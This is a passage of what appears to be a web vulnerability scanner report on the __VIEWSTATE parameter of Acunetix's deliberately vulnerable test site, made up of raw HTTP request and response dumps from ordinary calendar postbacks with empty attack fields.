href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8155&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAm148KtoIZGRkrTg1M5dd7DJfkuTq62%2FvJVuS9aU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLP6Y6kBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPKcn5Q0e6r1exf1k5a2PbAwyFotI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:46 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAm148KtoIZGRkrTg1M5dd7DJfkuTq62/vJVuS9aU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLP6Y6kBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPKcn5Q0e6r1exf1k5a2PbAwyFotI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:White" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8159&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAQghhLdoIZGRkfG2%2BmYEQzZaWLQoFbkKq5UUyLh0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKDmd%2F%2FDQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPjz39hziqR36Rn0nOEygm393uLrU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:44 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAQghhLdoIZGRkfG2+mYEQzZaWLQoFbkKq5UUyLh0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKDmd//DQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPjz39hziqR36Rn0nOEygm393uLrU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:White" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a 